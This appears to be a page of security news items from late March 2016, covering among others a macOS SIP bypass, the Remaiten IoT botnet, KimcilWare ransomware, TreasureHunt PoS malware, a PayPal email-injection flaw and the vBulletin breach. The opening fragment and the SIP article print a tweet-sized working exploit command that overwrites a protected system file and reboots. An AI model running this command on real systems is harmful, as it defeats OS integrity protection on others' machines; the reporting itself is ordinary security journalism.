ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code expands to:

ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot
Let’s hope Apple would fix all the open SIP issues as soon as possible.


Nebezpečná chyba v operačním systému iOS ohrožuje milióny uživatelů

31.3.2016 Zranitelnosti
Bezpečnostní analytici společnosti Check Point odhalili novou vážnou zranitelnost v operačním systému iOS od společnosti Apple, který využívají chytré telefony iPhone i počítačové tablety iPad. Chybu mohou útočníci zneužít k tomu, aby na napadené zařízení propašovali prakticky jakýkoliv škodlivý kód.
Chyba dostala pracovní název SideStepper. Útočníkům umožňuje zneužít komunikaci mezi jablečným telefonem nebo tabletem a tzv. MDM systémem. Jde v podstatě o řešení, které je především ve firmách využíváno pro vzdálenou instalaci aplikací a správu zařízení Apple.

Právě kvůli chybě v této komunikaci si útočníci s napadeným přístrojem mohou dělat, co je napadne. „Útočníci mohou zranitelnost zneužít například ke vzdálené instalaci škodlivých aplikací a ohrozit veškerá data v zařízení. Potenciálně tak mohou být ohroženy milióny iOS uživatelů po celém světě," řekl pro Novinky.cz David Řeháček, bezpečnostní odborník ze společnosti Check Point Software Technologies.

Útočí přes SMS i sociální sítě
Případný útok by mohl podle něj vypadat následovně. „Nejdříve přesvědčí uživatele k instalaci škodlivého konfiguračního profilu, například prostřednictvím phishingové zprávy. Jedná se o jednoduchý a efektivní způsob útoku, který využívá pro šíření škodlivého odkazu osvědčené komunikační platformy, jako jsou SMS, chatovací programy nebo e-mail. Útočníci pak mohou napodobovat příkazy, kterým iOS věří, a instalovat vzdáleně další škodlivé aplikace,“ doplnil Řeháček.

Prostřednictvím nich pak mohou uživatele odposlouchávat, odchytávat přihlašovací údaje a další citlivá data. Stejně tak ale mohou na dálku aktivovat kameru či mikrofon, aby zachytili zvuky a obrazy.

Detaily o nové zranitelnosti byly ve čtvrtek odpoledne zveřejněny na bezpečnostní konferenci Black Hat Asia. Případní počítačoví piráti tak mají v rukou prakticky vše, co potřebují, aby mohli trhlinu zneužít.

Doposud však nebyl zaznamenán žádný případ zneužití nově objevené zranitelnosti.

Obezřetnost je namístě
I když oprava chyby SideStepper zatím chybí, uživatelé mohou vcelku jednoduše minimalizovat riziko napadení sami. Stačí neotvírat SMS zprávy a e-maily od neznámých lidí, to samé platí o zprávách na sociálních sítích a v nejrůznějších chatovacích programech. Právě těmito kanály totiž počítačoví piráti útočí nejčastěji.

Na mobilní platformu iOS se v poslední době zaměřují kyberzločinci stále častěji. Tento měsíc například bezpečnostní experti varovali před trojským koněm AceDeceiverem, který dokáže v jablečných zařízeních udělat poměrně velkou neplechu. Otevře totiž pirátům zadní vrátka do systému, čímž jim zpřístupní nejen nastavení, ale také uživatelská data.


Advanced Malware targeting Internet of the Things and Routers
31.3.2016 Virus
Anything connected to the Internet could be hacked and so is the Internet of Things (IoTs).
The market fragmentation of IoTs or Internet-connected devices is a security nightmare, due to poor security measures implemented by their vendors.
Now, the researchers at security firm ESET have discovered a piece of Malware that is targeting embedded devices such as routers, and other connected devices like gateways and wireless access points, rather than computers or smartphones.
Dubbed KTN-Remastered or KTN-RM, the malware is a combination of both Tsunami (or Kaiten) as well as Gafgyt.
Tsunami is a well-known IRC (Internet Relay Chat) bot used by miscreants for launching Distributed Denial of Service (DDoS) attacks while Gafgyt is used for Telnet scanning.
KTN-RM, which researcher dubbed 'Remaiten,' features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.
How Does the Linux Malware Work?
The malware first performs Telnet scanning to look for routers and smart devices. Once the connection is made, the malware tries to guess the login credentials in an effort to take over weakly-secured devices.
If it successfully logs in, the malware will issue a shell command to download bot executable files for multiple system architectures before running them on the compromised networking kit.
"This is a simple but noisy way of ensuring that the new victim gets infected because it is likely that one of the binaries is for the current platform," explained ESET Malware Researcher Michal Malík. "It targets mainly those with weak login credentials."
The malware, version 2.0, also has a welcome message for those who might try to neutralise its threat, containing a reference to the Malware Must Die blog.
Perhaps it is a way to take revenge, as Malware Must Die has published extensive details about Gafgyt, Tsunami and other members of this Malware family.
For more technical details about KTN-RM or Remaiten, you can head on to ESET's official blog post published Wednesday.


Here's the Exploit to Bypass Apple Security Feature that Fits in a Tweet
31.3.2016 Apple
Did you install the latest update OS X 10.11.4?
If yes, then you might be wondering with a fact that the Apple had delivered an ineffective patch update this time.
Yes! This news would definitely disappoint many Apple users, as the latest update of OS X El Capitan 10.11.4 and iOS 9.3 still contain a privilege escalation vulnerability that could affect 130 Million Apple customers.
Just last week, we reported about a critical privilege escalation vulnerability in Apple's popular System Integrity Protection (SIP) security mechanism, affecting all versions of OS X operating system.
Even after Apple had fixed the critical flaw in the latest round of patches for Macs and iThings, the SIP can still be bypassed in the most recent version of operating system, leaving Apple users vulnerable to flaws that could remotely hijack their machines.
SIP Bypass Exploit Code Fits in a Tweet
Interestingly, Stefan Esser, a security researcher from Germany, has released a new exploit code to bypass latest patched version of SIP application, which just fits in a Tweet.
Here's the exploit code -- It can be used to modify a crucial OS X configuration file that not even root user is allowed to touch, reported The Register.
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code actually expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot
The above exploit code successfully bypasses Apple's SIP technology, allowing one to run processes as it is pleased.
What is System Integrity Protection (SIP)?
Apple introduced SIP, a security protection feature to the OS X kernel, with the release of OS X El Capitan, which is designed to restrict the root account of OS X machines and limit the actions a root user can perform on protected parts of the system.
Besides this, System Integrity Protection (SIP) also helps prevent software from changing your startup volume, blocks certain kernel extensions from being loaded and limits the debugging of certain apps.
System Integrity Protection or SIP, by default, protects these folders: /System, /usr, /bin, /sbin, along with applications that come pre-installed with OS X.
This is really a bad time for Apple and its users. Now, let's hope that the company would be more vigilant with its upcoming patch update.


The Linux Remaiten malware is building a Botnet of IoT devices
31.3.2016 Virus

Experts from the ESET firm have spotted a new threat in the wild dubbed Remaiten that targets embedded systems to recruit them in a botnet.
ESET is actively monitoring malicious codes that target IoT systems such as routers, gateways and wireless access points, rather than computers or smartphones.

Security researchers from ESET have discovered a new threat dubbed KTN-RM or Remaiten that targets Internet of Things devices by combining the capabilities of Linux malware known as Tsunami and Gafgyt.

Tsunami is a downloader/IRC Bot backdoor used in the criminal ecosystem to launch DDoS attacks, meanwhile Linux/Gafgyt serves as a backdoor that could be controlled remotely and used as a Telnet scanning.

“Recently, we discovered a bot that combines the capabilities ofTsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions ofLinux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.” states the official blog post published by the company.

The KTN-RM malware (aka Remaiten) implements an effective ,’ features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.

The attack scenario is similar to the one seen in the wild for other IoT threats, the Remaiten malware scan the Internet searching IoT devices that accept Telnet connections, then it tries to connect them by using a dictionary of login credentials. If the malware successfully login the device, it establishes a shell command to download other malicious binaries on the infected system.

The Linux Remaiten downloaders are small ELF executables embedded in the bot binary itself that are executed on the target devices to instruct it in connecting the bot’s C&C server. The researchers at ESET discovered that bot binaries include a hardcoded list of C&C server IP addresses, the bot also sends to the control server information on the infected device (i.e. IP address, login credentials, infection status).

“When instructed to perform telnet scanning, it tries to connect to random IP addresses reachable from the Internet on port 23. If the connection succeeds, it will try to guess the login credentials from an embedded list of username/password combinations. If it successfully logs in, it issues a shell command to download bot executables for multiple architectures and tries to run them. This is a simple albeit noisy way of infecting new victims, as it is likely one of the binaries will execute on the running architecture.” state the post.

The researcher also revealed a curiosity on the malware, the C&C server used for version 2.0 displays a welcome message that references the MalwareMustDie blog, let’s consider it a sort of revenge of the author for the popular team of researchers.

Remaiten bot_welcome_message1
Give a look to the report published by ESET for more technical details about the Remaiten malware.


Microsoft adds Linux Bash Shell and Ubuntu Binaries to Windows 10
31.3.2016 Safety
'Microsoft loves Linux' so much that now the company is bringing the popular Bash shell, alongside the entire Linux command environment, to its newest Windows 10 OS in the upcoming 'Anniversary Update,' Redstone.
The rumours before the Microsoft’s Build 2016 developer conference were true. Microsoft has just confirmed that it is going to enable its users to run Bash (Bourne Again Shell) natively on Windows 10.
Also Read: Microsoft Drops a Cloud Data Center Under the Ocean.
Microsoft has partnered with Ubuntu's parent company Canonical to ensure the Bash experience for users is just as good in Windows OS as it's in variants of Linux.
Although the Goal of the partnership, in the end, is to bring Ubuntu on Windows 10, don't expect it to run Ubuntu directly on Windows 10.
Users will be able to download Bash from the Windows Store. BASH or Bourne Again Shell is capable of handling advanced command line functionalities that are not a cup of tea for Powershell or CMDs.
"The Bash shell is coming to Windows. Yes, the real Bash is coming to Windows," said Microsoft's Kevin Gallo at Build 2016 keynote. "This is not a VM [Virtual Machine]. This is not cross-compiled tools. This is native."
There already exists third-party apps to implement Bash shell running on Windows, such as Cygwin or MSYS. But the new move by Microsoft would eliminate the usage of 3rd party utilities, offering, even more, flexibility for developers who prefer using these binaries and tools.
How to Run Bash on Windows?
run-bash-windows-10
Users just have to follow these simple steps to run Bash on Windows 10 OS:
Open the Windows Start menu
Type "bash"
Hit 'Enter'
This will open a command line console (cmd.exe) running Ubuntu's /bin/bash, Dustin Kirkland, Canonical's Ubuntu Product and Strategy team member, explains in a blog post.
The system features a full Ubuntu user space complete with support for tools including ssh, apt, rsync, find, grep, awk, sed, sort, xargs, md5sum, gpg, curl, wget, apache, mysql, python, perl, ruby, php, vim, emacs and more.
This is not Microsoft Linux for Windows
ubuntu-on-windows-10
Don’t get confused, as Microsoft is not enabling Linux applications to run on top of Windows nor this is "Microsoft Linux." The company is just providing support for Bash on Windows 10 as an expansion of its command-line tool family.
So, the company is working on integrating Ubuntu User Space in Windows 10, as a hacker has already spotted a Linux subsystem in preview build (build 14251) of the Windows 10 code in late January.
ubuntu-windows10-file-explorer
As Kirkland writes:
"So just Ubuntu running in a virtual machine?" Nope! This isn't a virtual machine at all. There's no Linux kernel booting in a VM under a hypervisor. It's just the Ubuntu user space. "Ah, okay, so this is Ubuntu in a container then?" Nope! This isn't a container either.
It's native Ubuntu binaries running directly in Windows. "Hum, well it's like cygwin perhaps?" Nope! Cygwin includes open source utilities are recompiled from source to run natively in Windows. Here, we're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows.
This isn't Microsoft's first step towards implementing Linux functionality in Windows. Just last year, Microsoft had worked on the Linux Kernel and made a Linux OS called Azure Cloud Switch. It also chose Ubuntu as the operating system for its Cloud-based Big Data services.

Channel9TV


Marine Corps Cyberspace Warfare Group, the new hacker unit
31.3.2016 Safety

The United States Marine Corps has launched on March 25th a new hacker support unit named Marine Corps Cyberspace Warfare Group.
It is unnecessary to remind the importance of cyber capabilities in the current military environment. Government and military corps are investing to improve their cyber abilities and exploits the immense possibilities offered by the cyberspace as the fifth domain of warfare.

News of the day is that the United States Marine Corps has launched on March 25th a new hacker support unit, it follows the establishment of other hacking units announced last year.

It is a strategic decision in response to a rapid technological evolution of the military context, the Marine Corps Cyberspace Warfare Group (MCCYWG) is already operative and the assigned resources are expected to rapidly expand in the next year.

The newborn Marine Corps Cyberspace Warfare Group will support the US Marine Corps Forces Cyberspace (MARFORCYBER) established by the US Government in 2010.
Marine Corps Cyberspace Warfare Group

The new Marine Corps Cyberspace Warfare Group will train and support hackers working for the US Marine Corps, its members will be involved in both offensive and defensive operations.

“The mission of MCCYWG is to man, train and equip Marine Cyberspace mission teams to perform both defensive and offensive cyber operations in support of United States Cyber Command and Marine Forces Cyberspace Command.” states the official website of US Marine Corps.

“We’ve always had the means to communicate and the means to protect that communication, but today we’re in an environment where those methods are more and more reliant on a system of transmissions, routers and networks,” said Col. Ossen J. D’Haiti, the commanding officer of MCCYWG. “So, the ability to protect that, the ability to control that and deny an adversary to interdict that, is crucial to command and control.”

The official announcement remarks that now more than ever, the Marine Corps is seeing the need for defense of its networks and communications. The Marine Corps Cyberspace Warfare Group will protect the Marine Corps infrastructure from cyber attacks, for this reason, in the announcement, it is described as a sort of virtual “firewall” against the cyber threats.

“Cyber operations as a whole are anything from ensuring your network is secure to home use like when you buy a router, set it up, set up passwords and encryptions,” said Sargent Brian Mueller, member of the unit.

“[Cyberspace operations] ensure that our systems are secure to stop hackers from getting into our systems where our personal identifiable information and everything else is stored,” added Mueller.

“While the offensive side is what can we do to hinder an enemy.”

Below the official description of the new hacker unit and its functions:

“Commander, MCCYWG organizes, trains, equips, provides administrative support, manages readiness, and recommends certification and presentation of Cyber Mission Force (CMF) Teams to U.S. Cyber Command. The MCCYWG plans and conducts full spectrum cyberspace operations as directed by COMMARFORCYBER in support of service, combatant command, joint, and coalition requirements.” states the website of the US Marine Corps.

Key MCCYWG tasks include:

Conduct personnel management to organize and assign individuals to work roles and place them in work centers to ensure operational readiness of CMF Teams
Ensure all personnel are trained in accordance with USCYBERCOM Joint Cyberspace Training and Certification Standards and equipped to perform all duties and tasks outlined in the MARFORCYBER Mission Essential Task List (METL)
Plan for and, when authorized, conduct OCO including computer network exploitation (CNE), cyberspace intelligence, surveillance, and reconnaissance (ISR) and operational preparation of the environment (OPE)
Plan and conduct designated DCO in response to threats against the MCEN, supported combatant command (COCOM) designated networks, and the Department of Defense Information Network (DODIN)
Advise COMMARFORCYBER on force employment considerations
Provide subject matter expertise for operational planning requirements


Enable this New Setting to Secure your Computer from Macro-based Malware
31.3.2016 Virus
Do you deal with MS Word files on the daily basis?
If yes, then are you aware that even opening a simple doc file could compromise your system?
It is a matter to think that the virus does not directly affect you, but it is you who let the virus carry out the attack by enabling deadly "Macros" to view the doc contents that are generally on eye-catching subjects like bank invoice.
How Macros are Crippling your System?
The concept of Macros dates back to 1990s. You must be familiar with this message: "Warning: This document contains macros."
A Macro is a series of commands and actions that help to automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.
Hackers are cleverly using this technique on the shade of social engineering by sending the malicious Macros through doc file or spreadsheet with an eye-catching subject in the mail to the corporate networks.
Once a user opens the malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file, and a popup window appears that states "Enable Editing" to view the content.
microsoft-office-macro-protected-view
Once the users click Enable Editing, the malicious file then begins to perform the notorious activities in the system such as to get embedded into other doc files to proliferate the attacking rate that results in crippling your system network.
All those actions would depend upon payload program defines inside the Macro.
Dridex and Locky are Warning Bells!!!
No other incidents could get you the clear picture on the potential threat of Macro viruses apart from Dridex Malware and Locky Ransomware. Both malware had made use of the malicious Macros to hijack systems.
Over 20 Million Euro had been stolen from the UK banks with the Dridex Malware, which got triggered via a nasty macro virus. The infectious bar of Locky ransomware had also seen an exponential growth in a couple of hours.
How to Protect Yourself from Macro-based Malware?
Step 1: Configure Trusted Location

Block-Macros-Office
Since disabling Macros is not a feasible option, especially in an office environment where Macros are designed to simplify the complex task with automation.
So, if your organization relies on Macros, you can move files that use Macros into the company’s DMZ (Demilitarized Zone), also called Trusted Location.
To configure the trusted location, you can navigate via:
User Configuration/Administrative Templates/Microsoft Office XXX 20XX/Application Settings/Security/Trust Center/Trusted Locations
Once configured, the Macros that does not belong to the trusted location would not run in any way, beefing up your system’s security.
Step 2: Block Macros in Office Files that came from the Internet

microsoft-office-macro-security
Microsoft had recently unveiled a novel method by implementing a new tactical security feature to limit the Macro execution attack in MS Office 2016, ultimately preventing your system from hijacking.
The new feature is a group policy setting that lets enterprise administrators to disable macros from running in Office files that come from the Internet.
The new setting is called, "Block macros from running in Office files from the Internet" and can be navigated through the group policy management editor under:
User configuration > Administrative templates > Microsoft Word 2016 > Word Options > Security > Trust Center
It can be configured for each Office application.
By enabling this option, macros that come from the Internet are blocked from running even if you have 'enable all macros' in the Macros Settings.
Moreover, instead of having the option to 'Enable Editing,' you'll receive a notification that macros are blocked from running, as the document comes from an Untrusted Source.
The only way to run that particular Office file is to save it to a trusted location, allowing macros to run.


PayPal flaw allowed hackers to send malicious emails
31.3.2016 Virus

PayPal has just fixed a security vulnerability that could have been exploited to send malicious emails to users via its platform.
Researchers at security firm Vulnerability Lab have discovered a filter bypass and an application-side input validation vulnerability that allowed attackers to inject malicious code into emails sent by the PayPal platform.

“A persistent input validation & mail encoding web vulnerability has been discovered in the official PayPal Inc online-service web-application. The validation and mail encoding web vulnerability allows remote attackers to inject own malicious script codes to the mail header of the portal mails. ” states the post published by the Vulnerability Lab.

When PayPal users create a new account, they can link it to multiple email addresses. Each email address has to be confirmed by the users by providing a confirmation code sent to the account they want to confirm.

hack-paypal

Unfortunately, an attacker could create an account and insert arbitrary HTML code in the account owner field.

The attack scenario is simple, the attacker links the new account to the victim’s email and insert a malicious code in the account owner name. The platform then sends the a confirmation email to that address of the victims, the message includes the malicious code that would get executed when the victims open the email.

The attack could be very insidious because the emails are sent from the legitimate PayPal platform through the account service[@]paypal.com, for this reason, the email is not detected as spam or malicious by the defense systems.

The above attack scenario could be exploited in phishing campaigns, session hijacking, and to redirect users to certain domains managed by the attackers.

Below a proof-of-concept video published by the experts at the Vulnerability Lab.

Vulnerability Lab reported the issue to PayPal in October 2015, the vulnerability has been fixed this month. The company awarded the researcher Kunz Mejri from Vulnerability Lab with $1,000.

The details of the flaw, for which Kunz Mejri received $1,000, were disclosed on Wednesday.


The KimcilWare Ransomware targets Magento Platforms
31.3.2016 Virus

Security experts from the MalwareHunterTeam have discovered KimcilWare ransomware, a malware specifically designed to target Magento e-commerce platforms.
Security experts from the MalwareHunterTeam have spotted a news train of ransomware, called KimcilWare, specifically designed to target Web servers, and more specifically Magento e-commerce platforms.
“A new ransomware called KimcilWare has been discovered that appears to be targeting web sites using the Magento eCommerce solution. It is currently unknown how these sites are being compromised, but victims will have their web site files encrypted using a Rijndael block cipher and then ransomed for anywhere between $140 USD and $415 USD depending on the variant that infected them. Unfortunately, at this time there is no way to decrypt the data for free.” states a blog post published on BleepingComputer.

The KimcilWare ransomware encrypts the files of the Magento platform, it is easy to recognize because it appends the “.kimcilware” extension at the end of each file. rendering the store useless.

“One script will encrypt all data on the web site and append the .kimcilware extension to all encrypted files. It will also insert a index.html file that displays the ransom note shown above. The KimcilWare variant has a ransom amount of $140 USD. You can see an example of a folder encrypted with the KimcilWare script below. ” continues BleepingComputer.

kimcilware ransomware
Source BleepingComputer

The malware also uses its index file in order to publish a black page that informs the victims that the server had been encrypted.

magento kimcilware ransomware

“Webserver Encrypted” states the message on the home page “Your webserver files has been encrypted with a unix algorithm encryptor. You must paw 140$ to decrypt your webserver files. Payment via Bitcoin only. For more information contact me at tuyuljahat@hotmail.com.”

Of course, the e-commerce becomes useless once the malware has encrypted all the files.

The bad news is that it is still unknown the infection process, but fortunately, the number of infections is still limited.

The KimcilWare ransomware was first reported on March 3 by the owner of a Magento store (version 1.9.1.0) on StackExchange. The administrator noticed that only one site on a server with multiple Magento instances was infected.

A second case was reported a few days later on Magento’s official forum, from a store owner running version 1.9.2.4. The Magento admin speculates a security issue affecting the Helios Vimeo Video Gallery extension.

Another ransomware having similar capabilities was discovered by the security researcher Jack (@Malwareforme). This second malware is called MireWare and uses the same tuyuljahat@hotmail.com email address in its ransom note included in the index page. From his analysis, MireWare is a variant of the

Jack noticed that MireWare is a variant of the Hidden Tear open source ransomware published by the Turkish security researchers Utku Sen for educational purposes.

The Hidden Tear was intentionally designed with security flaws and Bleeping Computer’s researchers Lawrence Abrams who analyzed MireWare confirmed that also this threat is currently broken due to the lack of a valid SSL certificate for its C&C server.

Experts believe that the KimcilWare ransomware is in its early stages, but that it might rapidly evolve.

If you administrate a Magento store update to the latest Magento store versions and use strong passwords for the admin accounts.


Google has also been Ordered to Unlock 9 Android Phones
30.3.2016 Apple
The legal battle between Apple and the FBI (Federal Bureau of Investigation) over a locked iPhone that belonged to one of the San Bernardino shooters may be over, but the Department of Justice (DoJ) are back in front of a judge with a similar request.
The American Civil Liberties Union (ACLU) has discovered publicly available court documents that revealed the government has asked Google’s assistance to help the Feds hack into at least nine locked Android smartphones citing the All Writs Act.
Yes, Apple is not the only company facing government requests over privacy and security — Google is also in the list.
The Google court documents released by the ACLU show that many federal agencies have been using the All Writs Act – the same ancient law the DoJ was invoking in the San Bernardino case to compel Apple to help the FBI in the terrorist investigation.
Additionally, the ACLU also released 54 court cases in which the federal authorities asked Apple for assistance to help them access information from a locked iPhone. However, this is the first time it has confirmed that Google has also received such requests.
All the cases appear to be closed, and the company is believed to have complied with all of the court orders. As in the majority of cases, Google was required to reset the passwords or bypass the lock screens of Samsung, HTC phones, Kyocera and Alcatel, among a number of other unidentified Android devices.
Unlike Apple, Google Can Reset Android Devices Remotely
In 2015, the New York District Attorney revealed that Google can remotely reset Android device password, in case a court demands access to it.
In other words, unlike Apple, Google has technical abilities to reset device passcode for about 74% of Android users (~Billions) running all versions older than Android 5.0 Lollipop that does not have full disk encryption.
Google had been ordered for technical assistance by many federal agencies over several cases including:
The Department of Homeland Security (DHS) in an investigation of an alleged child pornographer in California.
The FBI in the investigation of an alleged cocaine dealer, who go by the name “Grumpy,” in New Mexico.
The Bureau of Land Management in the investigation of an alleged marijuana grow operation in Oregon
The Secret Service in an unknown court case in North Carolina.
However, Google said none of the cases required the company to write new backdoored software for the federal government.
"We carefully scrutinize subpoenas and court orders to make sure they meet both the letter and spirit of the law," a Google spokesman said in a statement. "However, we have never received an All Writs Act order like the one Apple recently fought that demands we build new tools that actively compromise our products’ security….We would strongly object to such an order."
No doubt, 1789 All Writs Act is being misused as a tool against encryption, which was never intended to allow the government to dictate software design.


TreasureHunt PoS Malware targets small retailers and banks
30.3.2016 Virus

Security experts at FireEye have spotted the activity of a criminal organization that using the custom PoS malware TreasureHunt to target small retailers.
Security experts at FireEye have spotted the activity of a criminal organization that using custom PoS malware family to target retailers. Hackers are using the PoS malware dubbed TreasureHunt or TreasureHunter to steal payment card data and sells it on criminal underground forums.

The researchers found evidence that the threat has been around since at least late 2014. TreasureHunt was first discovered by researchers at the SANS institute who noticed the malware generating mutex names to evade detection.

EMV standardThe US retailers and merchants are adopting payment solutions based on the EMV standard that relies on chip-equipped cards, and for this reason are considered more secure.

A number of factors are hampering the introduction of EMV among small organizations.; the most important is probably is the high cost of the migration that it has been estimated at 8.6 billion dollars.

Consider that the cost of a single POS system that is compatible with EMV technology can reach hundreds of dollars and major retailers like Target will have to pay tens of millions of dollars in hardware. Also, don’t underestimate the additional cost of the introduction of the technology and its test in the live environment.

On the other end, banks will have to spend tens of millions to upgrade their internal systems to manage EMV payment card transactions.

Unfortunately, many cybercriminal groups have started focusing their efforts on organizations that are slow to make the transition, such as smaller banks and retailers. TreasureHunt is one of the tools used by malicious actors in attacks aimed at such organizations.

Clearly, many organizations are more slow in adopting the new standards and crooks are trying to exploit this delay targeting retailers and banks that are slow to make the transition.

TreasureHunt enumerates the processes running on the infected systems and implement memory scraping functions to extract credit and debit card information. Stolen payment card data are sent to C&C servers through HTTP POST requests.

“In this article we examine TREASUREHUNT, POS malware that appears to have been custom-built for the operations of a particular “dump shop,” which sells stolen credit card data. TREASUREHUNT enumerates running processes, extracts payment card information from memory, and then transmits this information to a command and control server.” FireEye researcher Nart Villeneuve explained in a blog post.

TreasureHunt malware PoS

The experts at FireEye believe that criminals compromised the PoS using stolen or weak credentials, once the TreasureHunt malware infected the systems, it installs itself in the “%APPDATA%” directory and maintain persistence by creating the registry entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jucheck
“The malware scans all running processes and ignores processes that contain System33, SysWOW64, or \Windows\explorer.exe in their module names. It searches for payment card data and, if found, sends the data encoded back to the CnC server,” FireEye researcher Nart Villeneuve explained in a blog post.

All the TreasureHunt samples have the same compilation timestamp, October 19, 2014., but experts were able to compile a timeline activity of the PoS malware by analyzing VirusTotal submissions and C&C domain registration details.

“While the compile timestamp remains the same as the previous version, the samples were first observed on Nov. 25, 2015, and March 3, 2016. The only significant change in this version is that the malware stores encoded configuration data in the NTFS alternate data streams (ADS) of the file %USERPROFILE%\ntuser.ini. We refer to these samples as version 0.1.1” due to the presence of the following string:

TreasureHunter version 0.1.1 Alpha, created by Jolly Roger
(jollyroger@prv.name) for BearsInc. Greets to Xylitol and co.”

“Jolly Roger” seems to be the author of the malware, likely a member of a hacker crew called “BearsInc” which has been offering stolen payment card data on black markets.

With an increasing number of major firms moving to EMV solution, security researchers expect to see criminals organizations increasingly targeting smaller retailers and banks that are still waiting to adopt the secure technology.


Following revelations on Paris attacks, US lawmakers target burner phones

30.3.2016 Mobil

Paris terrorists used burner phones and US lawmakers have proposed a bill that would force retailers to record the identity of the buyers of these devices.
Law enforcement and intelligence agencies worldwide are fighting against terrorist organizations operating in their territories, but investigations are hampered by the use of encrypted communications. After the Paris attacks, intelligence agencies made many speculations about possible communication channels adopted by the terrorists, including the use of the PS4 messaging system.

New revelations seem to exclude the above hypothesis, terrorists behind the Paris attacks used burner phones and not encryption to avoid being tracked.

“But the three teams in Paris were comparatively disciplined. They used only new phones that they would then discard, including several activated minutes before the attacks, or phones seized from their victims.” reported The New York Times.
The NYT cites a 55-page report compiled by the French antiterrorism police for France’s Interior Ministry and explains how the terrorists have used phones activated less than an hour before the attacks.

“Everywhere they went, the attackers left behind their throwaway phones,” states the post. “New phones linked to the assailants at the stadium and the restaurant also showed calls to Belgium in the hours and minutes before the attacks, suggesting a rear base manned by a web of still unidentified accomplices.” “Security camera footage showed Bilal Hadfi, the youngest of the assailants, as he paced outside the stadium, talking on a cellphone. The phone was activated less than an hour before he detonated his vest.”

Outside the Bataclan theater venue, the investigators found a Samsung smartphone in a dustbin with a Belgian SIM card used exclusively for the operation.

“It had a Belgian SIM card that had been in use only since the day before the attack. The phone had called just one other number—belonging to an unidentified user in Belgium.”

The police have found several unused burner phones “still in their wrappers” in a place used by the group of terrorists.

Burner Phones are an effective and secure method of communication used by criminals and terrorists. Prepaid phones are very cheap, using different mobile devices and different mobile phone numbers each time it is possible to evade monitoring activities operated by the intelligence agencies.

Soon something can change, at least in the US where lawmakers in California have proposed a new bill that would force retailers to verify and record the identity of the buyers of prepaid burner phones or similar mobile devices, as well as SIM cards.
prepaid burnet phones

The proposal was introduced by the Rep. Jackie Speier of California, the politic named it HR 4886, or “Closing the Pre-Paid Mobile Device Security Gap Act of 2016,” which will force require retailers to identify the purchaser of burner phones and SIM cards.
“A BILL To require purchasers of pre-paid mobile devices or SIM cards to provide identification, and for other purposes.” states the text that requests an authorized reseller to require the following information to the purchaser:
The full name of the purchaser.
The complete home address of the purchaser.
The date of birth of the purchaser.
An authorized reseller making a sale to a buyer not in person shall verify the purchaser information provided under section 2 by requiring the purchaser to submit the following information:

Valid credit or debit card account information.
Social Security number.
Driver’s license number.
Any other personal identifying information that the Attorney General finds, by regulation, to be necessary for purposes of this section.
The congresswomen explained that the bill will not eliminate the existence of burner phones, it is a necessary measure to prevent terror plots and many other illegal activities.

Speier Burner Phones

“This bill would close one of the most significant gaps in our ability to track and prevent acts of terror, drug trafficking, and modern-day slavery,” Speier said in a Wednesday blog post. The ‘burner phone’ loophole is [a glaring gap] in our legal framework that allows actors like 9/11 hijackers and the Times Square bomber to evade law enforcement while they plot to take innocent lives. The Paris attackers also used ‘burner phones.’ As we’ve seen so vividly over the past few days, we cannot afford to take these kinds of risks. It’s time to close this ‘burner phone’ loophole for good.”

There are some aspects that the Bill still doesn’t approach correctly, for example, what happen if a criminal uses a stolen identity?

In the SEC. 3. IDENTIFICATION VERIFICATION, under the “Other Sales” section it is contemplated the possibility of selling to people not in person opening the door to fraudulent purchases.

Let’s wait for the Congress opinion on the proposal.


vBulletin resets passwords after a targeted attack
30.3.2016 Incindent

vBulletin has suffered a severe attack last week that breached one of the Germany servers, in response it informed users that all passwords had been reset.
vBulletin has suffered a severe attack last week, in response it informed users that all passwords had been reset. According to the vBulletin developer Paul Marsden one of the Germany servers was breached by an unauthorized party.

“Due to the discovery yesterday of unauthorized access to of one of the VBG servers it is possible the hacker may have gained access to other vb systems as well. Therefore we have again taken the precaution of resetting all user password hashes. To be able to login to the site you will need to use the lost password functionality.
http://www.vbulletin.org/forum/login.php?do=lostpw
We apologise for any inconvenience this may cause.” said Marsden.

The attackers have breached the Germany (VBG – “vbulletin-germany.com”) server, a circumstance that could have allowed them to access other systems of the organization, including “vBulletin.com” and “vBulletin.org.”

At the time I was writing there aren’t other details on the data breach, Marsden highlighted that hackers haven’t used any exploits, a claim supported by the fact that the hackers server doesn’t run any instance of the popular CMS.

Mardden believes attackers have carefully planned the attack:

“I can tell you it wasnt via any vB exploit – in fact, the VBG site doesnt run vbulletin. Someone clearly targetted the site, it was obvious they had planned this quite carefully.”said Marsden.

This isn’t the first time that the platform is targeted by hackers, in November 2015, the official forum was shut down after a hacker using the online moniker “Coldzer0” defaced it.

The website has been defaced and the forum was displaying the message “Hacked by Coldzer0.”

According to DataBreaches.net, vBulletin, Foxit Software forums have been hacked by Coldzer0 that stole hundreds of thousands of users’ records.

The hacker published screenshots that show he managed to upload a shell to the forum website and accessed user personal information, including user IDs, names, email addresses, security questions and answers, and password salts).

vBulletin forum hacked 2

As usual, I strongly suggest users to change the passwords on any other website where they shared the same login credentials.


How to Disable Windows 10 Upgrade (Forever) With Just One Click
30.3.2016 OS
If you are a Windows 7 or Windows 8.1 user, who don't want to upgrade to Windows 10 now or anytime soon, you might be sick of Microsoft constantly pestering you to upgrade your OS.
